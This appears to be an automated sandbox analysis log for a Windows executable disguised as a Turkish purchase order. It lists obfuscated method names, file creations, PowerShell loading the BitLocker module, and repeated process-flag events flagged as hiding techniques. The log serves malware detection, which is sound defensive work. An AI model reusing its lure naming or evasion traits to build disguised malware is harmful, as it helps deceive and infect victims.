Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, PkCZU0gs0vLe3cuvBk.cs	High entropy of concatenated method names: 'mrcZjwvp12', 'Tt9Z2dSxy0', 'yxbZF3E9Zq', 'LaFZADxxHE', 'UXqZg13pI9', 'JAUZ7JCNJX', 'qAVZdwLrLB', 'ArCZRFOWfZ', 'TUxZVJQtG9', 'NwAZ0M2JFh'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, HUOitVGrF2tLZiYvtH.cs	High entropy of concatenated method names: 'rGcgrRZrCR', 'Uewg2tXhvb', 'XxMgA2y0Yj', 'RiPg7dOx9M', 'dmpgdR0W4x', 'kqPAyHfQry', 'cuUA9OaT1U', 'pweAHuPkdj', 'GAKA1B9x6Z', 'nG7ABNFkSB'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, IgYToyTS2XfjYSU5Ad.cs	High entropy of concatenated method names: 'dqbZcTePFH', 'gLVZQ1T4jt', 'c8aZUEOBfk', 'OmtZNXA4UX', 'PjGZOaRMl6', 'CnwZYaN5dw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, mGcpHVNvj4jYTR6ee7.cs	High entropy of concatenated method names: 'sgKDJfBngc', 'lq1DPdmTFf', 'PmfDOGHu7A', 'Wu0DholMNv', 'pHwDQ67RWG', 'wEWDUyZyXa', 'FbnDNGRWm8', 'DMpDYaZNHZ', 'IORDTtmnPh', 'unND57vpHQ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, NgnGiRxbjmhibcFxdK.cs	High entropy of concatenated method names: 'Dispose', 'ovNWBNMCI5', 'cVELQECccj', 'OpSEEQbZJG', 'S6uW4fVKj5', 'OwgWzmeoUO', 'ProcessDialogKey', 'sZbL37Gacj', 'OR1LWUxBM4', 'ok5LLvctmG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, SFM5dcuvFxfBQxWKdsb.cs	High entropy of concatenated method names: 'Dh1kXe1HgD', 'FKxk8Y8wbV', 'P3xkCCBm0g', 'm2ukumjRC4', 'YbJkx8E9S1', 'sNekoRuG5O', 'b98kIoBdb7', 'GCPkSS6tc0', 'FndkekLAnB', 'h7UkfYFfE7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, c4PgMshkeuZp3Hk058.cs	High entropy of concatenated method names: 'EvFCRrVcN', 'IQauYIcPg', 'LQRoubh60', 'XxHICJcGb', 'gQJeNNAqq', 'r1CfRIMIY', 'gNTQVlFNjAxyR98UsH', 'TGAgZ1Cd1Tbo9Q3gl6', 'L09ZGZPIW', 'V4w6onsmf'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, dsj0ng47PhdM71XPPF.cs	High entropy of concatenated method names: 'HB17X0jftp', 'gyE78wJoxA', 'D2s7CnJaOq', 'Pmw7uBBeGf', 'AMr7xOqTYe', 'kIS7oIdqPh', 'Rsm7IJV2AY', 'MmB7Sjosav', 'shq7epY46l', 'L3x7fJrGWF'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, TIrtDirDqJ1OEe3yG9.cs	High entropy of concatenated method names: 'PypFufvmXk', 'DWWFoEK5uA', 'FFCFSRSlTp', 'vRBFeaGJYx', 'ReBFDXZZVJ', 'NDGFnNFsWQ', 'XQIFGDOvei', 'ntSFZrctHJ', 'LiMFk8xVMh', 'tMHF6cXACi'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, rqgY43I29yopioxdeG.cs	High entropy of concatenated method names: 'PnZ2OZPAFJ', 'zfw2hINOCw', 'i7Z2wxEAGx', 'qYr2tg7tuP', 'bDY2yJYEvv', 'nqy29yFdt2', 'SWL2HBpgYP', 'Lmn21PXtfq', 'aHu2BIfyEV', 'tDG24nliby'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, U9J4EjoEU9Xe6kLqiP.cs	High entropy of concatenated method names: 'BJgGVUk2be', 'gdVG0kQepZ', 'ToString', 'h5BGjDkb76', 'QEuG279Gy8', 'ArMGFT8XkA', 'O7yGAd8RyK', 'KwNGghhben', 'UJlG7qk9FD', 'c7JGdHQcPM'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, sXJixuzS3YGNeFsAlV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GKnkbK0xiG', 'g2ckDv7EMD', 'aZuknJC0nW', 'VM8kGabfLr', 'pu8kZjmQQb', 'dU2kkNBZye', 'P6ck68XOCX'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, GAlNoXBqbc1xtX5qdy.cs	High entropy of concatenated method names: 'yY7W7wJAaD', 'r9bWdWvOdq', 'DtqWVHPZCu', 'abrW08Wfnt', 'hkhWDO8UhH', 'FiCWnxAaFM', 'Vt9O3hZ2fZuQcGQRbe', 'OZ0GE0aXeU7nqy10Cp', 'xbuWWqc3Ve', 'BXJWiLPsDv'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zPw5rLuMAYeCqU2rNJS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xr06Ob0i2K', 'tgG6hvy0ud', 'gsO6w15GUZ', 'rVB6tipsLZ', 'YMf6yNqfEM', 'Q4J69iNRZE', 'TeU6HgCBZF'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, bDQRot8csROeLadL4C.cs	High entropy of concatenated method names: 'niFkWqGMg8', 'UgokigFeFx', 'UfMkMOSmIM', 'UJqkjyjKee', 'mCwk2AD1SK', 'JmikAVmaq9', 'ulbkgNROQo', 'PtRZHwyCbV', 'E00Z1mIuHp', 'b6uZB8Gqy7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, vPql29dODRnLRowy8w.cs	High entropy of concatenated method names: 'DBo7jRBAF4', 'odg7FFODhi', 'MlB7gUDCOt', 'TGAg4wQtdy', 'PvRgzSw7C7', 'jfE73oLcMu', 'xoL7Woxsi5', 'oYP7L8txII', 'gWW7il9Ejo', 'xnY7MKQ8PJ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, LoXHfJytBratwc18rV.cs	High entropy of concatenated method names: 'fhgG1j9q3u', 'ioZG4nkVQ1', 'VtAZ3EwA4a', 'vaoZWtkN4j', 'iOXGl7hBos', 'aVEGPK0jRb', 'nIkGmKhUu0', 'RS3GOr05Rk', 'tiMGhIW64A', 'xSeGw8nyBq'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, tgBpXDFY3ZdZjnatoj.cs	High entropy of concatenated method names: 'RykbS8cEyB', 'v4GbeeB6d0', 'BMIbchkN7K', 'tlbbQ9ugSA', 'h8ibNBtxuU', 'oZqbYiHh3f', 'enHb5o54iV', 'rE0bsvWigG', 'iIsbJClW9E', 'CDVblx1UiG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	High entropy of concatenated method names: 'smVirfWXqD', 'IhMijySULJ', 'YDVi2Zj5NC', 'MLeiFvqAqt', 'zx6iAJ1VWQ', 'dq4igqbLDP', 'ri3i78KubU', 'DA8id9sjUE', 'PFJiR4hnUR', 'fXAiVXsGsr'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, PkCZU0gs0vLe3cuvBk.cs	High entropy of concatenated method names: 'mrcZjwvp12', 'Tt9Z2dSxy0', 'yxbZF3E9Zq', 'LaFZADxxHE', 'UXqZg13pI9', 'JAUZ7JCNJX', 'qAVZdwLrLB', 'ArCZRFOWfZ', 'TUxZVJQtG9', 'NwAZ0M2JFh'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, HUOitVGrF2tLZiYvtH.cs	High entropy of concatenated method names: 'rGcgrRZrCR', 'Uewg2tXhvb', 'XxMgA2y0Yj', 'RiPg7dOx9M', 'dmpgdR0W4x', 'kqPAyHfQry', 'cuUA9OaT1U', 'pweAHuPkdj', 'GAKA1B9x6Z', 'nG7ABNFkSB'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, IgYToyTS2XfjYSU5Ad.cs	High entropy of concatenated method names: 'dqbZcTePFH', 'gLVZQ1T4jt', 'c8aZUEOBfk', 'OmtZNXA4UX', 'PjGZOaRMl6', 'CnwZYaN5dw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, mGcpHVNvj4jYTR6ee7.cs	High entropy of concatenated method names: 'sgKDJfBngc', 'lq1DPdmTFf', 'PmfDOGHu7A', 'Wu0DholMNv', 'pHwDQ67RWG', 'wEWDUyZyXa', 'FbnDNGRWm8', 'DMpDYaZNHZ', 'IORDTtmnPh', 'unND57vpHQ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, NgnGiRxbjmhibcFxdK.cs	High entropy of concatenated method names: 'Dispose', 'ovNWBNMCI5', 'cVELQECccj', 'OpSEEQbZJG', 'S6uW4fVKj5', 'OwgWzmeoUO', 'ProcessDialogKey', 'sZbL37Gacj', 'OR1LWUxBM4', 'ok5LLvctmG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, SFM5dcuvFxfBQxWKdsb.cs	High entropy of concatenated method names: 'Dh1kXe1HgD', 'FKxk8Y8wbV', 'P3xkCCBm0g', 'm2ukumjRC4', 'YbJkx8E9S1', 'sNekoRuG5O', 'b98kIoBdb7', 'GCPkSS6tc0', 'FndkekLAnB', 'h7UkfYFfE7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, c4PgMshkeuZp3Hk058.cs	High entropy of concatenated method names: 'EvFCRrVcN', 'IQauYIcPg', 'LQRoubh60', 'XxHICJcGb', 'gQJeNNAqq', 'r1CfRIMIY', 'gNTQVlFNjAxyR98UsH', 'TGAgZ1Cd1Tbo9Q3gl6', 'L09ZGZPIW', 'V4w6onsmf'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, dsj0ng47PhdM71XPPF.cs	High entropy of concatenated method names: 'HB17X0jftp', 'gyE78wJoxA', 'D2s7CnJaOq', 'Pmw7uBBeGf', 'AMr7xOqTYe', 'kIS7oIdqPh', 'Rsm7IJV2AY', 'MmB7Sjosav', 'shq7epY46l', 'L3x7fJrGWF'

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	File created: \siparis. 000867000960 tavsan order_optium a.s 03.07.2024.exe
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	File created: \siparis. 000867000960 tavsan order_optium a.s 03.07.2024.exe
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	File created: \siparis. 000867000960 tavsan order_optium a.s 03.07.2024.exe	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	File created: \siparis. 000867000960 tavsan order_optium a.s 03.07.2024.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
